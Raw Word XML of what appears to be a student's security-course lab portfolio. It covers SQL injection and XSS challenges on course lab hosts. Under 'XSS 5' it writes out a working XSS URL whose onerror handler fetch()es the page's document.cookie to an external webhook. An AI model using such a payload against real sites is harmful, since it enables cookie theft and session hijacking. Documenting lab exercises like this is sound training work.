          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69BFFA4F" w14:textId="440E681F" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="393EE6A0" w14:textId="44C759A3" w:rsidR="42E83AC9" w:rsidRDefault="00E838A9" w:rsidP="42E83AC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E838A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>SQLi4</w:t>
            </w:r>
            <w:r w:rsidR="00C54874">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1466365F" w14:textId="3B68287C" w:rsidR="00C54874" w:rsidRDefault="00C54874" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="3F4D0AB4" w14:textId="68BAA646" w:rsidR="003F1846" w:rsidRDefault="003F1846" w:rsidP="003F1846">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Initially I tried to break the sql by breaking the user input here to prove that I can take control and used a sleep and this caused the gateway to fail rather than an exception being pulled so that helped me figure out the open door</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EBD33D2" w14:textId="501DA3E9" w:rsidR="003F1846" w:rsidRPr="00C54874" w:rsidRDefault="003F1846" w:rsidP="003F1846">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="003F1846">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C25F438" wp14:editId="79F75FDD">
                  <wp:extent cx="4683318" cy="1676688"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="45927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4888" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4696926" cy="1681560"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="12BBF377" w14:textId="3ED0AE2F" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="003F1846" w:rsidP="42E83AC9">
            <w:r w:rsidRPr="003F1846">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B7076E" wp14:editId="66240762">
                  <wp:extent cx="5498327" cy="2753275"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
                  <wp:docPr id="69401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7140" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId21"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5501315" cy="2754771"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="06110A1E" w14:textId="78DB4C54" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="609BBD08" w14:textId="4E6701A4" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="236E0C9D" w14:textId="589427DD" w:rsidR="42E83AC9" w:rsidRPr="00AE14A7" w:rsidRDefault="00AE14A7" w:rsidP="42E83AC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE14A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>XSS 5:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22115BF1" w14:textId="53C70D99" w:rsidR="00AE14A7" w:rsidRDefault="00AE14A7" w:rsidP="00AE14A7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>I could find that the error page in the URL take HTML injection and by first trying to bold it and put an image in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A7663F7" w14:textId="00AEBCF6" w:rsidR="00C27111" w:rsidRDefault="00AE14A7" w:rsidP="00F5572B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Then I tried with console.log(1) as the on error to see if that gets sanitized or not, which it didn’t, so then I found my entry point for javascript injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270D4AD0" w14:textId="6F7189C7" w:rsidR="00F5572B" w:rsidRDefault="00F5572B" w:rsidP="00F5572B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>I then decided to enter this url with a javascript forwarding session to a webhook I have to then retrieve the cookie from the server:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653C4F89" w14:textId="77777777" w:rsidR="00031E5F" w:rsidRDefault="00031E5F" w:rsidP="00031E5F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6512FF4B" w14:textId="0BDAB502" w:rsidR="00AE14A7" w:rsidRPr="00ED5F6D" w:rsidRDefault="00F5572B" w:rsidP="00AE14A7">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00AE14A7" w:rsidRPr="00AE14A7">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E171B9" wp14:editId="730E688E">
                  <wp:extent cx="4801815" cy="3290323"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                  <wp:docPr id="31557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1931" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4810926" cy="3296566"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3805EF94" w14:textId="0703E670" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="00F5572B" w:rsidP="42E83AC9">
            <w:r w:rsidRPr="00F5572B">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAC02F9" wp14:editId="50FACB58">
                  <wp:extent cx="5943600" cy="1924050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="139102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29199" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId23"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1924050"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3345DD74" w14:textId="2A037EBB" w:rsidR="42E83AC9" w:rsidRPr="00E838A9" w:rsidRDefault="00E838A9" w:rsidP="42E83AC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E838A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>XSS 6:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BFB98AE" w14:textId="2F7D9B2F" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36149FC0" w14:textId="263CC0F7" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
    <w:p w14:paraId="20118911" w14:textId="472D5B30" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="46CD8C25" w:rsidP="42E83AC9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analysis and Reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130579C9" w14:textId="0CD67161" w:rsidR="6C805450" w:rsidRPr="00ED5F6D" w:rsidRDefault="5C182900" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Tutorial </w:t>
        </w:r>
        <w:r w:rsidR="2890882B" w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>3: Houdini</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="453D7FD1" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA738D1" w14:textId="440E681F" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="2A96993A" w14:textId="118CD246" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="4C0C3A8B" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5824D917" w14:textId="78DB4C54" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5F92C56F" w14:textId="4E6701A4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="6F72FB4A" w14:textId="3615F003" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="12D0A47C" w14:textId="038A15B2" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="37C93A73" w14:textId="366D6F02" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="418E882A" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="0F0DB0BA" w14:textId="46D8D1B1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FC229BF" w14:textId="371D3543" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="371C62D3"/>
    <w:p w14:paraId="659447F6" w14:textId="0B6405E0" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="64F38000" w:rsidP="42D4980C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wrap up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD548E" w14:textId="3B8DCC9B" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="50317446" w:rsidP="181B8E52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:t>Submission Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B53AEA" w14:textId="68559542" w:rsidR="13D4C4C5" w:rsidRDefault="13D4C4C5" w:rsidP="181B8E52">
      <w:r w:rsidRPr="00ED5F6D">
        <w:t>To submit a valid portfolio entry, complete the activities, save your work as a PDF, and upload it to the relevant week’s submission page on Moodle.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="13D4C4C5">
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="default" r:id="rId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as A. Gosman" w:date="2026-06-17T07:21:00Z" w:initials="TG">
    <w:p w14:paraId="021B784C" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="00903D82">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Diagram Still Required, Summarised Post Required</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="Thomas A. Gosman" w:date="2026-06-20T11:12:00Z" w:initials="TG">
    <w:p w14:paraId="1A27AC78" w14:textId="77777777" w:rsidR="005A08DC" w:rsidRDefault="005A08DC" w:rsidP="005A08DC">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Note from solo teenager hacker to large botnet they have forgotten the seconds per hour calculation and so a factor of 3600 needs to be used to recalculate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1B784C" w15:done="0"/>
  <w15:commentEx w15:paraId="1A27AC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BFA7A" w16cex:dateUtc="2026-06-16T21:21:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="5FA03D0A" w16cex:dateUtc="2026-06-20T0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B784C" w16cid:durableId="760BFA7A"/>
  <w16cid:commentId w16cid:paraId="1A27AC78" w16cid:durableId="5FA03D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21F3B" w14:textId="77777777" w:rsidR="0058592F" w:rsidRPr="00ED5F6D" w:rsidRDefault="0058592F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3011BF26" w14:textId="77777777" w:rsidR="0058592F" w:rsidRPr="00ED5F6D" w:rsidRDefault="0058592F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F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D4980C" w:rsidRPr="00ED5F6D" w14:paraId="643ADC9B" w14:textId="77777777" w:rsidTr="42D4980C">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="35EEB507" w14:textId="186EAC52" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="5257BA03" w14:textId="0F9956ED" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="55A980A9" w14:textId="7FBE0784" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00ED5F6D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00ED5F6D">
            <w:instrText>PAGE</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED5F6D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00901E67" w:rsidRPr="00ED5F6D">
            <w:t>1</w:t>
          </w:r>
          <w:r w:rsidRPr="00ED5F6D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="5054D1AD" w14:textId="4E52EB4D" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D49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BD5A0" w14:textId="77777777" w:rsidR="0058592F" w:rsidRPr="00ED5F6D" w:rsidRDefault="0058592F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2F31CC07" w14:textId="77777777" w:rsidR="0058592F" w:rsidRPr="00ED5F6D" w:rsidRDefault="0058592F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6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2D4980C" w:rsidRPr="00ED5F6D" w14:paraId="118E8916" w14:textId="77777777" w:rsidTr="42D4980C">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="1EB5D365" w14:textId="591620E8" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="541F3FC1" w14:textId="72D00FD6" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="3499D55A" w14:textId="4A5FB59C" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="49A62F83" w14:textId="1BD81BCE" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D498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03D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDD24D2E"/>
    <w:lvl w:ilvl="0" w:tplc="DC32290A">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7B7B7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16F28AC0"/>
    <w:lvl w:ilvl="0" w:tplc="545A5952">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1B4EE3E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="01E62962">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1772D078">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="05BEAA4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="900CBCEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2236B97A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="029A3578">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CBF2BC18">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4923DB14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58F04830"/>
    <w:lvl w:ilvl="0" w:tplc="D4CE8E94">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6690424C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="AD426FA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F1084880">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EDDEEB3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2C9019BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A8425D6E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A3905324">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EF680EC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6C0B3BCB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66E27918"/>
    <w:lvl w:ilvl="0" w:tplc="8092D73A">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57A9A20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B212E0C6"/>
    <w:lvl w:ilvl="0" w:tplc="98A2ED60">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="03563B6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1F0EB64A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BF1646A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
